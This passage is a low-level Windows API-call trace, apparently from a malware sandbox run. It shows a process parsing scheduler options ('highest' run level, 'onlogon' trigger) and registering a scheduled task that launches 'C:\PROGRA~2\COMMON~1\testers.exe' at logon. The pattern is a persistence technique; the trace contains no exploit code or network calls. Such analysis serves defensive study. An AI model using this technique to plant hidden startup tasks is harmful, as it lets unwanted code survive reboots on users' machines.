_Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|m|") returned 3 [0157.224] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tr|") returned 4 [0157.224] lstrlenW (lpString="|m|") returned 3 [0157.224] lstrlenW (lpString="|tr|") returned 4 [0157.224] SetLastError (dwErrCode=0x490) [0157.224] lstrlenW (lpString="i") returned 1 [0157.224] lstrlenW (lpString="i") returned 1 [0157.224] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.224] lstrlenW (lpString="tr") returned 2 [0157.224] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.224] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|i|") returned 3 [0157.224] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tr|") returned 4 [0157.224] lstrlenW (lpString="|i|") returned 3 [0157.224] lstrlenW (lpString="|tr|") returned 4 [0157.224] SetLastError (dwErrCode=0x490) [0157.224] lstrlenW (lpString="tn") returned 2 [0157.224] lstrlenW (lpString="tn") returned 2 [0157.224] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.224] lstrlenW (lpString="tr") returned 2 [0157.224] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.224] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tn|") returned 4 [0157.224] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tr|") returned 4 [0157.224] lstrlenW (lpString="|tn|") returned 4 [0157.224] lstrlenW (lpString="|tr|") returned 4 [0157.224] StrStrIW (lpFirst="|tn|", lpSrch="|tr|") returned 0x0 [0157.224] SetLastError (dwErrCode=0x490) [0157.224] lstrlenW (lpString="tr") returned 2 [0157.224] lstrlenW (lpString="tr") returned 2 [0157.224] _memicmp (_Buf1=0x4c4ce0, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.224] lstrlenW (lpString="tr") returned 2 [0157.224] _memicmp (_Buf1=0x4c4d10, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.224] _vsnwprintf (in: _Buffer=0x4c5368, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tr|") returned 4 [0157.224] _vsnwprintf (in: _Buffer=0x4c5328, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12cd84 | out: _Buffer="|tr|") returned 4 [0157.225] lstrlenW (lpString="|tr|") returned 4 [0157.225] lstrlenW (lpString="|tr|") returned 4 [0157.225] StrStrIW (lpFirst="|tr|", lpSrch="|tr|") returned="|tr|" [0157.225] SetLastError (dwErrCode=0x0) [0157.225] SetLastError (dwErrCode=0x0) [0157.225] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 32 [0157.225] lstrlenW (lpString="-/") returned 2 [0157.225] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0 [0157.225] SetLastError (dwErrCode=0x490) [0157.225] SetLastError (dwErrCode=0x490) [0157.225] SetLastError (dwErrCode=0x0) [0157.225] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 32 [0157.225] StrChrIW (lpStart="C:\\PROGRA~2\\COMMON~1\\testers.exe", wMatch=0x3a) returned=":\\PROGRA~2\\COMMON~1\\testers.exe" [0157.225] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 32 [0157.225] _memicmp (_Buf1=0x4c4d40, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.225] _memicmp (_Buf1=0x4c4d70, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.225] SetLastError (dwErrCode=0x7a) [0157.225] SetLastError (dwErrCode=0x0) [0157.225] SetLastError (dwErrCode=0x0) [0157.225] lstrlenW (lpString="C") returned 1 [0157.225] SetLastError (dwErrCode=0x490) [0157.225] SetLastError (dwErrCode=0x0) [0157.225] _memicmp (_Buf1=0x4c4d28, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.225] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 32 [0157.225] GetProcessHeap () returned 0x4b0000 [0157.225] HeapValidate (hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c4cf8) returned 1 [0157.225] GetProcessHeap () returned 0x4b0000 [0157.225] RtlReAllocateHeap (Heap=0x4b0000, Flags=0xc, Ptr=0x4c4cf8, Size=0x42) returned 0x4c69f8 [0157.225] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 32 [0157.225] lstrlenW (lpString=" \x09") returned 2 [0157.225] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0157.225] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0157.225] StrChrW (lpStart=" \x09", wMatch=0x3a) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x50) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x7e) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x32) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x4e) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x7e) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x31) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x2e) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0157.226] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0157.226] GetLastError () returned 0x0 [0157.226] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 32 [0157.226] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 32 [0157.226] SetLastError (dwErrCode=0x0) [0157.227] GetProcessHeap () returned 0x4b0000 [0157.227] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c5408 [0157.227] _memicmp (_Buf1=0x4c4cc8, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.227] LoadStringW (in: hInstance=0x0, uID=0x20d, lpBuffer=0x4c6728, cchBufferMax=256 | out: lpBuffer="LIMITED") returned 0x7 [0157.227] lstrlenW (lpString="LIMITED") returned 7 [0157.227] GetProcessHeap () returned 0x4b0000 [0157.227] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x10) returned 0x4c4cf8 [0157.227] GetThreadLocale () returned 0x409 [0157.227] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="highest", cchCount1=-1, lpString2="LIMITED", cchCount2=-1) returned 1 [0157.227] GetProcessHeap () returned 0x4b0000 [0157.227] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c53e8 [0157.227] _memicmp (_Buf1=0x4c4cc8, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.227] LoadStringW (in: hInstance=0x0, uID=0x20e, lpBuffer=0x4c6728, cchBufferMax=256 | out: lpBuffer="HIGHEST") returned 0x7 [0157.227] lstrlenW (lpString="HIGHEST") returned 7 [0157.227] GetProcessHeap () returned 0x4b0000 [0157.227] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x10) returned 0x4c4d88 [0157.227] GetThreadLocale () returned 0x409 [0157.227] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="highest", cchCount1=-1, lpString2="HIGHEST", cchCount2=-1) returned 2 [0157.227] GetProcessHeap () returned 0x4b0000 [0157.227] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c53c8 [0157.227] _memicmp (_Buf1=0x4c4cc8, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.227] LoadStringW (in: hInstance=0x0, uID=0x1ae, lpBuffer=0x4c6728, cchBufferMax=256 | out: lpBuffer="MINUTE") returned 0x6 [0157.227] lstrlenW (lpString="MINUTE") returned 6 [0157.227] GetProcessHeap () returned 0x4b0000 [0157.228] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0xe) returned 0x4c4da0 [0157.228] GetThreadLocale () returned 0x409 [0157.228] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onlogon", cchCount1=-1, lpString2="MINUTE", cchCount2=-1) returned 3 [0157.228] GetProcessHeap () returned 0x4b0000 [0157.228] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c53a8 [0157.228] _memicmp (_Buf1=0x4c4cc8, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.228] LoadStringW (in: hInstance=0x0, uID=0x1af, lpBuffer=0x4c6728, cchBufferMax=256 | out: lpBuffer="HOURLY") returned 0x6 [0157.228] lstrlenW (lpString="HOURLY") returned 6 [0157.228] GetProcessHeap () returned 0x4b0000 [0157.228] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0xe) returned 0x4c4db8 [0157.228] GetThreadLocale () returned 0x409 [0157.228] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onlogon", cchCount1=-1, lpString2="HOURLY", cchCount2=-1) returned 3 [0157.228] GetProcessHeap () returned 0x4b0000 [0157.243] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c5388 [0157.243] _memicmp (_Buf1=0x4c4cc8, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.243] LoadStringW (in: hInstance=0x0, uID=0x1b0, lpBuffer=0x4c6728, cchBufferMax=256 | out: lpBuffer="DAILY") returned 0x5 [0157.243] lstrlenW (lpString="DAILY") returned 5 [0157.243] GetProcessHeap () returned 0x4b0000 [0157.243] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0xc) returned 0x4c4dd0 [0157.243] GetThreadLocale () returned 0x409 [0157.243] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onlogon", cchCount1=-1, lpString2="DAILY", cchCount2=-1) returned 3 [0157.243] GetProcessHeap () returned 0x4b0000 [0157.243] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c5348 [0157.243] _memicmp (_Buf1=0x4c4cc8, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.243] LoadStringW (in: hInstance=0x0, uID=0x1b1, lpBuffer=0x4c6728, cchBufferMax=256 | out: lpBuffer="WEEKLY") returned 0x6 [0157.243] lstrlenW (lpString="WEEKLY") returned 6 [0157.243] GetProcessHeap () returned 0x4b0000 [0157.243] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0xe) returned 0x4c4de8 [0157.243] GetThreadLocale () returned 0x409 [0157.243] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onlogon", cchCount1=-1, lpString2="WEEKLY", cchCount2=-1) returned 1 [0157.244] GetProcessHeap () returned 0x4b0000 [0157.244] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x14) returned 0x4c5488 [0157.244] _memicmp (_Buf1=0x4c4cc8, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.244] LoadStringW (in: hInstance=0x0, uID=0x1b2, lpBuffer=0x4c6728, cchBufferMax=256 | out: lpBuffer="MONTHLY") returned 0x7 [0157.244] lstrlenW (lpString="MONTHLY") returned 7 [0157.244] GetProcessHeap () returned 0x4b0000 [0157.244] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x10) returned 0x4c4e00 [0157.244] GetThreadLocale () returned 0x409 [0157.244] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onlogon", cchCount1=-1, lpString2="MONTHLY", cchCount2=-1) returned 3 [0157.244] _memicmp (_Buf1=0x4c4cc8, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.244] LoadStringW (in: hInstance=0x0, uID=0x1b3, lpBuffer=0x4c6728, cchBufferMax=256 | out: lpBuffer="ONCE") returned 0x4 [0157.244] lstrlenW (lpString="ONCE") returned 4 [0157.244] GetProcessHeap () returned 0x4b0000 [0157.244] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0xa) returned 0x4c4e18 [0157.244] GetThreadLocale () returned 0x409 [0157.244] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onlogon", cchCount1=-1, lpString2="ONCE", cchCount2=-1) returned 3 [0157.244] _memicmp (_Buf1=0x4c4cc8, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.244] LoadStringW (in: hInstance=0x0, uID=0x1b4, lpBuffer=0x4c6728, cchBufferMax=256 | out: lpBuffer="ONSTART") returned 0x7 [0157.245] lstrlenW (lpString="ONSTART") returned 7 [0157.245] GetThreadLocale () returned 0x409 [0157.245] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onlogon", cchCount1=-1, lpString2="ONSTART", cchCount2=-1) returned 1 [0157.245] _memicmp (_Buf1=0x4c4cc8, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.245] LoadStringW (in: hInstance=0x0, uID=0x1b5, lpBuffer=0x4c6728, cchBufferMax=256 | out: lpBuffer="ONLOGON") returned 0x7 [0157.245] lstrlenW (lpString="ONLOGON") returned 7 [0157.245] GetThreadLocale () returned 0x409 [0157.245] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="onlogon", cchCount1=-1, lpString2="ONLOGON", cchCount2=-1) returned 2 [0157.245] SetLastError (dwErrCode=0x0) [0157.245] GetProcessHeap () returned 0x4b0000 [0157.245] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x1fc) returned 0x4c6a48 [0157.245] _memicmp (_Buf1=0x4c4cc8, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.245] LoadStringW (in: hInstance=0x0, uID=0x1d7, lpBuffer=0x4c6728, cchBufferMax=256 | out: lpBuffer="First") returned 0x5 [0157.245] lstrlenW (lpString="First") returned 5 [0157.245] _memicmp (_Buf1=0x4c4cc8, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.245] LoadStringW (in: hInstance=0x0, uID=0x1d8, lpBuffer=0x4c6728, cchBufferMax=256 | out: lpBuffer="Second") returned 0x6 [0157.245] lstrlenW (lpString="Second") returned 6 [0157.245] _memicmp (_Buf1=0x4c4cc8, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.245] LoadStringW (in: hInstance=0x0, uID=0x1d9, lpBuffer=0x4c6728, cchBufferMax=256 | out: lpBuffer="Third") returned 0x5 [0157.245] lstrlenW (lpString="Third") returned 5 [0157.246] _memicmp (_Buf1=0x4c4cc8, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.246] LoadStringW (in: hInstance=0x0, uID=0x1da, lpBuffer=0x4c6728, cchBufferMax=256 | out: lpBuffer="Fourth") returned 0x6 [0157.246] lstrlenW (lpString="Fourth") returned 6 [0157.246] _memicmp (_Buf1=0x4c4cc8, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.246] LoadStringW (in: hInstance=0x0, uID=0x1db, lpBuffer=0x4c6728, cchBufferMax=256 | out: lpBuffer="Last") returned 0x4 [0157.246] lstrlenW (lpString="Last") returned 4 [0157.258] _memicmp (_Buf1=0x4c4cc8, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.258] LoadStringW (in: hInstance=0x0, uID=0x1d7, lpBuffer=0x4c6728, cchBufferMax=256 | out: lpBuffer="First") returned 0x5 [0157.258] lstrlenW (lpString="First") returned 5 [0157.258] _memicmp (_Buf1=0x4c4cc8, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.258] LoadStringW (in: hInstance=0x0, uID=0x1d8, lpBuffer=0x4c6728, cchBufferMax=256 | out: lpBuffer="Second") returned 0x6 [0157.258] lstrlenW (lpString="Second") returned 6 [0157.258] _memicmp (_Buf1=0x4c4cc8, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.258] LoadStringW (in: hInstance=0x0, uID=0x1d9, lpBuffer=0x4c6728, cchBufferMax=256 | out: lpBuffer="Third") returned 0x5 [0157.258] lstrlenW (lpString="Third") returned 5 [0157.258] GetProcessHeap () returned 0x4b0000 [0157.258] GetProcessHeap () returned 0x4b0000 [0157.258] HeapValidate (hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c4e18) returned 1 [0157.258] GetProcessHeap () returned 0x4b0000 [0157.258] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4c4e18) returned 0xa [0157.258] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c4e18 | out: hHeap=0x4b0000) returned 1 [0157.258] GetProcessHeap () returned 0x4b0000 [0157.258] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0xc) returned 0x4c4e18 [0157.258] _memicmp (_Buf1=0x4c4cc8, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.258] LoadStringW (in: hInstance=0x0, uID=0x1da, lpBuffer=0x4c6728, cchBufferMax=256 | out: lpBuffer="Fourth") returned 0x6 [0157.258] lstrlenW (lpString="Fourth") returned 6 [0157.258] _memicmp (_Buf1=0x4c4cc8, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.258] LoadStringW (in: hInstance=0x0, uID=0x1db, lpBuffer=0x4c6728, cchBufferMax=256 | out: lpBuffer="Last") returned 0x4 [0157.258] lstrlenW (lpString="Last") returned 4 [0157.258] GetLocaleInfoW (in: Locale=0x400, LCType=0x21, lpLCData=0x12cc28, cchData=128 | out: lpLCData="0") returned 2 [0157.259] _memicmp (_Buf1=0x4c4cc8, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.259] LoadStringW (in: hInstance=0x0, uID=0x19c, lpBuffer=0x4c6728, cchBufferMax=256 | out: lpBuffer="mm/dd/yyyy") returned 0xa [0157.259] lstrlenW (lpString="mm/dd/yyyy") returned 10 [0157.259] GetProcessHeap () returned 0x4b0000 [0157.259] GetProcessHeap () returned 0x4b0000 [0157.259] HeapValidate (hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c4cf8) returned 1 [0157.259] GetProcessHeap () returned 0x4b0000 [0157.259] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4c4cf8) returned 0x10 [0157.259] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c4cf8 | out: hHeap=0x4b0000) returned 1 [0157.259] GetProcessHeap () returned 0x4b0000 [0157.259] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x16) returned 0x4c54a8 [0157.259] GetLocaleInfoW (in: Locale=0x400, LCType=0x21, lpLCData=0x12cc30, cchData=128 | out: lpLCData="0") returned 2 [0157.259] _memicmp (_Buf1=0x4c4cc8, _Buf2=0x781ed8, _Size=0x7) returned 0 [0157.259] LoadStringW (in: hInstance=0x0, uID=0x19c, lpBuffer=0x4c6728, cchBufferMax=256 | out: lpBuffer="mm/dd/yyyy") returned 0xa [0157.259] lstrlenW (lpString="mm/dd/yyyy") returned 10 [0157.259] GetProcessHeap () returned 0x4b0000 [0157.259] GetProcessHeap () returned 0x4b0000 [0157.259] HeapValidate (hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c4d88) returned 1 [0157.259] GetProcessHeap () returned 0x4b0000 [0157.259] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4c4d88) returned 0x10 [0157.259] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c4d88 | out: hHeap=0x4b0000) returned 1 [0157.261] GetProcessHeap () returned 0x4b0000 [0157.261] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0xc, Size=0x16) returned 0x4c54c8 [0157.261] GetLocalTime (in: lpSystemTime=0x12cde0 | out: lpSystemTime=0x12cde0*(wYear=0x7e4, wMonth=0x7, wDayOfWeek=0x5, wDay=0x18, wHour=0x17, wMinute=0x1a, wSecond=0x12, wMilliseconds=0xe)) [0157.261] GetLocalTime (in: lpSystemTime=0x12d1fc | out: lpSystemTime=0x12d1fc*(wYear=0x7e4, wMonth=0x7, wDayOfWeek=0x5, wDay=0x18, wHour=0x17, wMinute=0x1a, wSecond=0x12, wMilliseconds=0xe)) [0157.261] lstrlenW (lpString="") returned 0 [0157.261] lstrlenW (lpString="") returned 0 [0157.261] lstrlenW (lpString="") returned 0 [0157.261] lstrlenW (lpString="") returned 0 [0157.261] lstrlenW (lpString="") returned 0 [0157.261] lstrlenW (lpString="") returned 0 [0157.261] lstrlenW (lpString="") returned 0 [0157.261] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0157.269] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0157.288] CoCreateInstance (in: rclsid=0x78230c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x7820fc*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x12d1b4 | out: ppv=0x12d1b4*=0x243da8) returned 0x0 [0157.417] TaskScheduler:ITaskService:Connect (This=0x243da8, serverName=0x12d124*(varType=0x8, wReserved1=0x2e53, wReserved2=0xd1b8, wReserved3=0x12, varVal1=0x0, varVal2=0x12d19c), user=0x12d134*(varType=0x0, wReserved1=0x750e, wReserved2=0xb024, wReserved3=0x4a0, varVal1=0x12ec90, varVal2=0x12e0a0), domain=0x12d144*(varType=0x0, wReserved1=0x9ed, wReserved2=0xe068, wReserved3=0x12, varVal1=0x78994e, varVal2=0x12f68c), password=0x12d154*(varType=0x0, wReserved1=0x773c, wReserved2=0x3c, wReserved3=0x0, varVal1=0x2e53f000, varVal2=0xffffffac)) returned 0x0 [0157.426] TaskScheduler:IUnknown:AddRef (This=0x243da8) returned 0x2 [0157.426] TaskScheduler:ITaskService:GetFolder (in: This=0x243da8, Path=0x0, ppFolder=0x12d258 | out: ppFolder=0x12d258*=0x243e10) returned 0x0 [0157.429] TaskScheduler:ITaskService:NewTask (in: This=0x243da8, flags=0x0, ppDefinition=0x12d268 | out: ppDefinition=0x12d268*=0x243e78) returned 0x0 [0157.442] ITaskDefinition:get_Actions (in: This=0x243e78, ppActions=0x12d1b4 | out: ppActions=0x12d1b4*=0x243ef0) returned 0x0 [0157.442] IActionCollection:Create (in: This=0x243ef0, Type=0, ppAction=0x12d1cc | out: ppAction=0x12d1cc*=0x242620) returned 0x0 [0157.444] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 32 [0157.444] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 32 [0157.445] lstrlenW (lpString=" ") returned 1 [0157.445] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0157.445] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0157.445] StrChrW (lpStart=" ", wMatch=0x3a) returned 0x0 [0157.445] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0157.445] StrChrW (lpStart=" ", wMatch=0x50) returned 0x0 [0157.445] StrChrW (lpStart=" ", wMatch=0x52) returned 0x0 [0157.445] StrChrW (lpStart=" ", wMatch=0x4f) returned 0x0 [0157.445] StrChrW (lpStart=" ", wMatch=0x47) returned 0x0 [0157.445] StrChrW (lpStart=" ", wMatch=0x52) returned 0x0 [0157.445] StrChrW (lpStart=" ", wMatch=0x41) returned 0x0 [0157.445] StrChrW (lpStart=" ", wMatch=0x7e) returned 0x0 [0157.445] StrChrW (lpStart=" ", wMatch=0x32) returned 0x0 [0157.445] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0157.445] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0157.445] StrChrW (lpStart=" ", wMatch=0x4f) returned 0x0 [0157.445] StrChrW (lpStart=" ", wMatch=0x4d) returned 0x0 [0157.445] StrChrW (lpStart=" ", wMatch=0x4d) returned 0x0 [0157.445] StrChrW (lpStart=" ", wMatch=0x4f) returned 0x0 [0157.445] StrChrW (lpStart=" ", wMatch=0x4e) returned 0x0 [0157.445] StrChrW (lpStart=" ", wMatch=0x7e) returned 0x0 [0157.445] StrChrW (lpStart=" ", wMatch=0x31) returned 0x0 [0157.445] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0157.445] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0157.445] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0157.445] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0157.445] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0157.445] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0157.445] StrChrW (lpStart=" ", wMatch=0x72) returned 0x0 [0157.446] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0157.446] StrChrW (lpStart=" ", wMatch=0x2e) returned 0x0 [0157.446] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0157.446] StrChrW (lpStart=" ", wMatch=0x78) returned 0x0 [0157.446] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0157.446] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 32 [0157.446] StrChrIW (lpStart="C:\\PROGRA~2\\COMMON~1\\testers.exe", wMatch=0x20) returned 0x0 [0157.446] SetLastError (dwErrCode=0x490) [0157.446] IUnknown:Release (This=0x242620) returned 0x1 [0157.446] IUnknown:Release (This=0x243ef0) returned 0x1 [0157.446] ITaskDefinition:get_Triggers (in: This=0x243e78, ppTriggers=0x12cda0 | out: ppTriggers=0x12cda0*=0x243fa8) returned 0x0 [0157.446] ITriggerCollection:Create (in: This=0x243fa8, Type=9, ppTrigger=0x12cdac | out: ppTrigger=0x12cdac*=0x242660) returned 0x0 [0157.478] IUnknown:QueryInterface (in: This=0x242660, riid=0x781528*(Data1=0x72dade38, Data2=0xfae4, Data3=0x4b3e, Data4=([0]=0xba, [1]=0xf4, [2]=0x5d, [3]=0x0, [4]=0x9a, [5]=0xf0, [6]=0x2b, [7]=0x1c)), ppvObject=0x12cd98 | out: ppvObject=0x12cd98*=0x242660) returned 0x0 [0157.478] IUnknown:Release (This=0x242660) returned 0x2 [0157.478] _vsnwprintf (in: _Buffer=0x12cd10, _BufferCount=0x1f, _Format="%04u-%02u-%02dT%02u:%02u:00", _ArgList=0x12ccf8 | out: _Buffer="2020-07-24T23:26:00") returned 19 [0157.478] ITrigger:put_StartBoundary (This=0x242660, StartBoundary="2020-07-24T23:26:00") returned 0x0 [0157.478] lstrlenW (lpString="") returned 0 [0157.478] lstrlenW (lpString="") returned 0 [0157.478] lstrlenW (lpString="") returned 0 [0157.478] lstrlenW (lpString="") returned 0 [0157.478] IUnknown:Release (This=0x242660) returned 0x1 [0157.479] IUnknown:Release (This=0x243fa8) returned 0x1 [0157.479] ITaskDefinition:get_Settings (in: This=0x243e78, ppSettings=0x12d1bc | out: ppSettings=0x12d1bc*=0x2424e0) returned 0x0 [0157.479] lstrlenW (lpString="") returned 0 [0157.479] IUnknown:Release (This=0x2424e0) returned 0x1 [0157.479] GetLocalTime (in: lpSystemTime=0x12d0ac | out: lpSystemTime=0x12d0ac*(wYear=0x7e4, wMonth=0x7, wDayOfWeek=0x5, wDay=0x18, wHour=0x17, wMinute=0x1a, wSecond=0x12, 